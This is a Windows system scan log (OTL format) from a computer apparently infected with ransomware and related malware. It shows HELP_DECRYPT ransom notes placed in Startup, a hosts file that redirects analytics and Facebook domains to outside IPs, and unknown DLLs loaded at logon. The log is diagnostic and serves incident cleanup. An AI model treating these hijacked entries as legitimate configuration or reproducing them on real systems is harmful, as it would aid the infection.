DRV:64bit: - [2013/08/22 05:37:28 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2013/08/22 05:37:28 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c)
DRV:64bit: - [2013/08/22 05:37:14 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:64bit: - [2013/08/22 05:36:43 | 000,087,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc63.sys -- (netvsc)
DRV:64bit: - [2013/08/22 05:36:25 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus)
DRV:64bit: - [2013/08/22 05:36:07 | 000,066,560 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp)
DRV:64bit: - [2013/08/22 05:35:42 | 000,103,424 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Stopped] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu)
DRV:64bit: - [2013/08/22 02:46:33 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fxppm.sys -- (FxPPM)
DRV:64bit: - [2013/08/12 17:25:46 | 000,017,624 | ---- | M] (Windows ® Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2)
DRV:64bit: - [2013/08/09 18:39:30 | 000,651,248 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV)
DRV:64bit: - [2013/07/30 12:47:35 | 000,024,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO)
DRV:64bit: - [2013/07/25 13:05:39 | 000,099,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C)
DRV:64bit: - [2013/06/18 08:46:17 | 000,591,360 | ---- | M] (Realtek                                            ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt630x64.sys -- (RTL8168)
DRV:64bit: - [2013/05/22 23:25:28 | 001,139,800 | ---- | M] (Symantec Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1406000.01B\symefa64.sys -- (SymEFA)
DRV:64bit: - [2013/05/20 23:02:00 | 000,493,656 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1406000.01B\symds64.sys -- (SymDS)
DRV:64bit: - [2013/05/15 23:02:14 | 000,796,760 | ---- | M] (Symantec Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1406000.01B\srtsp64.sys -- (SRTSP)
DRV:64bit: - [2013/04/24 18:43:56 | 000,433,752 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1406000.01B\symnets.sys -- (SymNetS)
DRV:64bit: - [2013/04/15 20:41:14 | 000,169,048 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1406000.01B\ccsetx64.sys -- (ccSet_NIS)
DRV:64bit: - [2013/03/04 19:40:08 | 000,224,416 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1406000.01B\ironx64.sys -- (SymIRON)
DRV:64bit: - [2013/03/04 19:21:35 | 000,036,952 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1406000.01B\srtspx64.sys -- (SRTSPX)
DRV:64bit: - [2012/08/21 14:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012/07/04 12:41:58 | 000,339,600 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RtsPStor.sys -- (RSPCIESTOR)
DRV:64bit: - [2012/06/25 11:24:50 | 000,092,536 | ---- | M] (CyberLink) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\CLVirtualDrive.sys -- (CLVirtualDrive)
DRV:64bit: - [2012/06/20 15:27:30 | 000,023,448 | R--- | M] (Symantec Corporation) [Kernel | Disabled | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1406000.01B\symelam.sys -- (SymELAM)
DRV:64bit: - [2012/06/20 13:51:32 | 000,020,232 | ---- | M] (HandSet Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\massfilter_hs.sys -- (massfilter_hs)
DRV:64bit: - [2012/03/31 00:49:08 | 000,056,448 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\usbfilter.sys -- (usbfilter)
DRV - [2015/02/21 08:13:00 | 000,013,192 | ---- | M] (Sysinternals) [Kernel | On_Demand | Stopped] -- C:\Users\Dorothy01\AppData\Local\Temp\NTFS.sys -- (BS1924802738)
DRV - [2014/09/12 16:11:19 | 001,586,904 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\BASHDefs\20140912.003\BHDrvx64.sys -- (BHDrvx64)
DRV - [2014/09/09 09:00:55 | 000,487,216 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys -- (eeCtrl)
DRV - [2014/09/09 09:00:55 | 000,142,640 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys -- (EraserUtilRebootDrv)
DRV - [2014/09/01 21:58:46 | 002,137,304 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\VirusDefs\20140920.001\ex64.sys -- (NAVEX15)
DRV - [2014/09/01 21:58:46 | 000,129,752 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\VirusDefs\20140920.001\eng64.sys -- (NAVENG)
DRV - [2014/08/29 15:40:15 | 000,633,560 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\IPSDefs\20140919.001\IDSviA64.sys -- (IDSVia64)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPDSK13/1
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = Reg Error: Value error.
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = Reg Error: Value error.
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{8E0E081D-FD81-46C2-AD92-3B939C17F151}: "URL" = http://www.amazon.co...s={searchTerms}
IE - HKLM\..\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}: "URL" = http://search.yahoo....psg&type=HPDTDF
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = Preserve
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
IE - HKCU\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...Box&FORM=IE8SRC
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
 
========== FireFox ==========
 
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=11.31.2: C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=11.31.2: C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3555.0308: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{BBDA0591-3099-440a-AA10-41764D9DB4DB}: C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\IPSFF [2014/07/23 11:01:38 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}: C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\coFFPlgn\ [2015/02/20 07:09:50 | 000,000,000 | ---D | M]
 
[2015/02/19 21:14:49 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2015/02/19 21:14:49 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
========== Chrome  ==========
 
CHR - plugin: Error reading preferences file
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.4_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5023_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif\1.0.5_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\
 
O1 HOSTS File: ([2015/02/21 03:31:16 | 000,001,509 | RHS- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O1 - Hosts: ::1             localhost
O1 - Hosts: 195.162.68.59 www.google-analytics.com.
O1 - Hosts: 195.162.68.59 google-analytics.com.
O1 - Hosts: 195.162.68.59 connect.facebook.net.
O1 - Hosts: 162.247.13.54 www.google-analytics.com.
O1 - Hosts: 162.247.13.54 google-analytics.com.
O1 - Hosts: 162.247.13.54 connect.facebook.net.
O1 - Hosts: 195.162.69.252 www.google-analytics.com.
O1 - Hosts: 195.162.69.252 google-analytics.com.
O1 - Hosts: 195.162.69.252 connect.facebook.net.
O2:64bit: - BHO: (no name) - {7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} - No CLSID value found.
O2:64bit: - BHO: (no name) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - No CLSID value found.
O2 - BHO: (Norton Identity Protection) - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\coieplg.dll (Symantec Corporation)
O2 - BHO: (Norton Vulnerability Protection) - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\ips\ipsbho.dll (Symantec Corporation)
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (no name) - {7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} - No CLSID value found.
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (HP Network Check Helper) - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
O3:64bit: - HKLM\..\Toolbar: (no name) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - No CLSID value found.
O3:64bit: - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3 - HKLM\..\Toolbar: (Norton Toolbar) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\coieplg.dll (Symantec Corporation)
O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O4:64bit: - HKLM..\Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Realtek Semiconductor)
O4 - HKLM..\Run: [AvastUI.exe] C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software)
O4 - HKLM..\Run: [CLMLServer_For_P2G8] c:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe (CyberLink)
O4 - HKLM..\Run: [CLVirtualDrive] c:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe (CyberLink Corp.)
O4 - HKLM..\Run: [CrashReportSaver] C:\Windows\Installer\{4E61FB7C-E89A-4510-ADC1-B38572ADB03D}\msiexec.exe (EFD Software)
O4 - HKLM..\Run: [StartCCC] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe (Advanced Micro Devices, Inc.)
O4 - HKCU..\Run: [acikmao] rundll32 "C:\Users\Dorothy01\AppData\Local\acikmao.dll",acikmao File not found
O4 - HKCU..\Run: [Driver Support] C:\Program Files (x86)\Driver Support\Driver Support\DriverSupport.exe /applicationMode:systemTray /showWelcome:false File not found
O4 - Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML ()
O4 - Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG ()
O4 - Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT ()
O4 - Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL ()
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: SoftwareSASGeneration = 1
O9 - Extra Button: @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-103 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9 - Extra 'Tools' menuitem : @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-102 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000007 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000007 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{0C5C3F02-879E-42E8-8113-9C0FA649DB90}: NameServer = 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{462105B1-AF78-47E3-AC0D-109F28027A93}: DhcpNameServer = 192.168.1.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{462105B1-AF78-47E3-AC0D-109F28027A93}: NameServer = 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: NameServer = 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{9B004C7D-7A34-4A9C-BEDB-5212A582FAB1}: DhcpNameServer = 192.168.1.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{9B004C7D-7A34-4A9C-BEDB-5212A582FAB1}: NameServer = 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{D24FA36B-6CD5-4603-8F72-73AC28D99F5B}: NameServer = 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\WINDOWS\SysWow64\userinit.exe (Microsoft Corporation)
O20 - Winlogon\Notify\pckunie: DllName - (C:\Users\Dorothy01\AppData\Local\pckunie.dll) - C:\Users\Dorothy01\AppData\Local\pckunie.dll ()
O20 - Winlogon\Notify\pgkunge: DllName - (C:\Users\Dorothy01\AppData\Local\pgkunge.dll) - C:\Users\Dorothy01\AppData\Local\pgkunge.dll ()
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O30 - LSA: Security Packages - (livessp) -  File not found
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{5042c0a6-b247-11e4-bed4-089e013a632b}\Shell - "" = AutoRun
O33 - MountPoints2\{5042c0a6-b247-11e4-bed4-089e013a632b}\Shell\AutoRun\command - "" = "G:\AutoRun.exe" 
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2015/02/21 08:13:04 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Microsoft
[2015/02/20 06:45:09 | 000,000,000 | ---D | C] -- C:\Users\Dorothy01\AppData\Local\CrashDumps
[2015/02/20 06:08:52 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Java
[2015/02/20 06:07:45 | 000,000,000 | ---D | C] -- C:\ProgramData\RogueKiller
[2015/02/19 22:04:32 | 000,000,000 | ---D | C] -- C:\Users\Dorothy01\AppData\Roaming\AVAST Software
[2015/02/19 21:33:51 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2015/02/19 21:27:48 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
[2015/02/19 21:27:15 | 000,364,512 | ---- | C] (AVAST Software) -- C:\WINDOWS\SysNative\aswBoot.exe
[2015/02/19 21:20:43 | 000,000,000 | ---D | C] -- C:\Program Files\Google
[2015/02/19 21:20:39 | 000,000,000 | ---D | C] -- C:\ProgramData\Google
[2015/02/19 21:20:09 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
[2015/02/19 21:18:08 | 000,000,000 | ---D | C] -- C:\Users\Dorothy01\AppData\Local\Google
[2015/02/19 21:18:08 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Google
[2015/02/19 21:17:51 | 001,050,432 | ---- | C] (AVAST Software) -- C:\WINDOWS\SysNative\drivers\aswsnx.sys
[2015/02/19 21:17:51 | 000,436,624 | ---- | C] (AVAST Software) -- C:\WINDOWS\SysNative\drivers\aswSP.sys
[2015/02/19 21:17:51 | 000,083,280 | ---- | C] (AVAST Software) -- C:\WINDOWS\SysNative\drivers\aswmonflt.sys
[2015/02/19 21:17:46 | 000,043,152 | ---- | C] (AVAST Software) -- C:\WINDOWS\avastSS.scr
[2015/02/19 21:15:57 | 000,000,000 | ---D | C] -- C:\Program Files\AVAST Software
[2015/02/19 21:15:30 | 000,000,000 | ---D | C] -- C:\ProgramData\AVAST Software
[2015/02/19 21:13:57 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2015/02/18 16:53:03 | 000,129,752 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\MBAMSwissArmy.sys
[2015/02/18 16:52:33 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
[2015/02/18 16:52:27 | 000,093,400 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\mbamchameleon.sys
[2015/02/18 16:52:27 | 000,064,216 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\mwac.sys
[2015/02/18 16:52:27 | 000,025,816 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\mbam.sys
[2015/02/18 16:52:26 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes Anti-Malware
[2015/02/18 16:52:26 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2015/02/18 16:49:06 | 000,000,000 | ---D | C] -- C:\Users\Dorothy01\AppData\Local\Programs
[2015/02/18 16:48:30 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
[2015/02/18 16:48:28 | 000,000,000 | ---D | C] -- C:\Program Files\CCleaner
[2015/02/18 16:39:38 | 000,000,000 | ---D | C] -- C:\WINDOWS\pss
[2015/02/11 17:53:23 | 000,175,808 | ---- | C] (ZTE Corporation) -- C:\WINDOWS\SysNative\drivers\zghsnet.sys
[2015/02/11 17:53:23 | 000,134,976 | ---- | C] (ZTE Corporation) -- C:\WINDOWS\SysNative\drivers\zghsser.sys
[2015/02/11 17:53:23 | 000,062,728 | ---- | C] (VIA Telecom) -- C:\WINDOWS\SysNative\drivers\viahsser.sys
[2015/02/11 17:53:23 | 000,032,136 | ---- | C] (Via Telecom, Inc.) -- C:\WINDOWS\SysNative\drivers\viahsets.sys
[2015/02/11 17:53:23 | 000,020,232 | ---- | C] (HandSet Incorporated) -- C:\WINDOWS\SysNative\drivers\massfilter_hs.sys
[2015/02/11 17:53:13 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ZTE Handset USB Driver
[2015/02/11 17:53:08 | 000,000,000 | ---D | C] -- C:\Program Files\ZTE_Handset_USB_Driver
[2015/01/24 16:45:15 | 000,000,000 | ---D | C] -- C:\Users\Dorothy01\AppData\Local\{294523ef-b8b6-59cc-fe37-7cd365b2a599}
[2011/07/11 21:06:59 | 000,212,304 | ---- | C] (Microsoft Corporation) -- C:\Users\Dorothy01\AppData\Roaming\BtvStack.dll
 
========== Files - Modified Within 30 Days ==========
 
[2015/02/21 18:39:41 | 001,041,788 | ---- | M] () -- C:\WINDOWS\SysNative\perfh009.dat
[2015/02/21 18:39:41 | 000,244,124 | ---- | M] () -- C:\WINDOWS\SysNative\perfc009.dat
[2015/02/21 18:39:41 | 000,006,428 | ---- | M] () -- C:\WINDOWS\SysNative\PerfStringBackup.INI
[2015/02/21 18:35:45 | 000,067,584 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2015/02/21 18:33:31 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys
[2015/02/21 18:33:30 | 3070,296,064 | -HS- | M] () -- C:\hiberfil.sys
[2015/02/21 06:48:19 | 000,045,610 | ---- | M] () -- C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG
